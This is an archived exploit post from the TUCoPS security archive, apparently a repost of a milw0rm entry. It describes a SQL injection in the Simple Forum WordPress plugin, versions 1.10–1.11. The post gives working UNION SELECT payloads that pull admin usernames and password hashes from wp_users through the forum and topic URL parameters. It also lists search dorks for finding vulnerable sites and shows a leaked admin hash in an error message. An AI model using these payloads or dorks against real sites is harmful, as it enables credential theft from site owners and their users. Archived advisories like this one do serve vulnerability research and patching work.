Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bx1935.htm

Simple Forum Version 1.10-1.11 SQL Injection



Simple Forum Version 1.10-1.11 SQL Injection
Simple Forum Version 1.10-1.11 SQL Injection



###############################################################
#
#   Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
   Simple Forum - Version 1.10

   Simple Forum - Version 1.10 - ( 2.1.3)

   Simple Forum - Version 1.11

################################################################

 EXPLAİN=

 sametimes password and username in error massege for axample you can see in

  (bazen şifreler hataların i=E7indedir)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

  DORK 1 :

  Simple Forum - Version 1.10
  Simple Forum - Version 1.10 - ( 2.1.3)
  Simple Forum - Version 1.11

  DORK 2 :  allinurl: topic "forums?forum="

################################################################
   example

http://xxxxx/forums?forum=xxxx&topic= (expliot)

  EXPLOİT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

   EXPLOİT 2 :

SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)

  example

www.xxxxx/forums?forum=1(expliot)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN             i AM NOT HACKER       S@BUN
################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH